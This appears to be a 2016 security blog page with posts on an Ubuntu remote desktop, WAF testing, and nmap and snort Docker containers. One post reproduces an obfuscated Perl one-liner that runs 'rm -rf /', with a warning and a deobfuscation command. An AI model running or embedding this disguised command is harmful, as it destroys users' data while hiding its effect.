Ubuntu Remote Desktop On Digital Ocean

I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it  down to these 10 commands to bring a Ubuntu + Mate + XRDP desktop to a Ubuntu Droplet :

sudo apt-get update && sudo apt-get dist-upgrade -y
sudo apt-get install --no-install-recommends ubuntu-mate-core ubuntu-mate-desktop -y
sudo apt-get install mate-core mate-desktop-environment mate-notification-daemon xrdp -y
adduser burp
usermod -aG admin burp
usermod -aG sudo burp
su - burp
echo mate-session> ~/.xsession
sudo cp /home/burp/.xsession /etc/skel
sudo service xrdp restart

From there you can use any RDP viewer to connect to your droplet: Screen Shot 2016-10-19 at 9.15.22 PM


‘rm -rf /’ still works on OSX

Earlier this week someone sent me this one line perl script (that you shouldn’t run):
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Due to some really clever code obfuscation  it runs rm -rf /.

You  can deobfuscate (is that word?) with this:
perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"'

While trying to figure out how this code code I stumbled upon the fact that OSX does not require  --no-preserve-root which has been required since version 6.4 of GNU Core Utilities which was released in 2006.

Here is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'  on Ubuntu 16:10:

Screen Shot 2016-10-16 at 7.54.36 PMHere is what happens if you run perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'  on MacOS 10.12:

2016-10-16 19.59.13

This seems like a pretty big oversight by the Apple Team and I have filled a bug report but haven’t heard anything yet.

WAF Testing With Random User Agents.

Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website.   I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500 valid user agents from this file.

First I went with the old standby of CURL which does the job but I was only able to do 10 requests in 4 seconds.

Here is what the output of curl.sh looks like:

That was not going to be fast enough for my testing needs so I switch to Apache Bench and am able to do 1,000 requests in 2 seconds. Which was what I need to do proper testing.

Here is what the output of ab.sh looks like:

All the scripts are in this GitHub Repo.
As always:  Use these for good, not bad.

RaiNmap Container

I use nmap all the time at work and recently came across rainmap-lite which is an amazing web interface for nmap that allows you to easily schedule and email scan results.  I wanted to be able to share it with a class I am teaching so I did what I  have been doing lately and put it into a docker container:

Screen Shot 2016-08-30 at 8.21.19 PM

Running it is as simple as:
docker run -ti -p 8080:8080 --name rianmap jgamblin/rainmap
Then access:

You can now run a ton of nmap scans and get the results emailed to you and your team:  Screen Shot 2016-08-30 at 7.47.54 PM Screen Shot 2016-08-30 at 7.53.10 PM

Here is the DockerFile:
FROM ubuntu:latest
RUN apt-get update && apt-get install sqlite3 git nmap python-pip  -y
RUN pip install --upgrade pip
RUN pip install lxml
RUN pip install Django
RUN git clone https://github.com/cldrn/rainmap-lite
WORKDIR /rainmap-lite/rainmap-lite/
ADD  run.sh /rainmap-lite/rainmap-lite/run.sh
RUN chmod 777 /rainmap-lite/rainmap-lite/run.sh
CMD ./run.sh

Here is the run.sh:
sed -i "s/8000/8080/g" "nmaper-cronjob.py"
echo What is your public IP address?
read ip
sed -i "s/$ip/g" "nmaper-cronjob.py"
echo What is your SMTP user name?
read user
sed -i "s/youremail@gmail.com/$user/g" "nmaper-cronjob.py"
echo What is your SMTP password?
read pass
sed -i "s/yourpassword/$pass/g" "nmaper-cronjob.py"
echo What is your SMTP address?
read smtp
sed -i "s/smtp.gmail.com/$smtp/g" "nmaper-cronjob.py"
python manage.py migrate
python manage.py loaddata nmapprofiles
python manage.py createsuperuser
python manage.py runserver &
while true
python nmaper-cronjob.py
sleep 15

Protip:  SendGrid offers a free SMTP server. 

WebSnort Docker Container

One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with  snort -dv -r test.pcap but the output is not great.

I have been using a tool called websnort for better output recently and decided it was time to put it into a docker container for easy portability.

Screen Shot 2016-08-25 at 7.48.51 AM

To run it: 
docker run -d -p 8080:8080 jgamblin/websnort

If you want to build your own the  dockerfile is:
FROM ubuntu:latest
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get update && apt-get install python-pip snort -y
RUN chmod a+r /etc/snort/snort.conf
RUN pip install websnort
CMD websnort

 malware-traffic-analysis.net has great PCAPs for testing your security tools.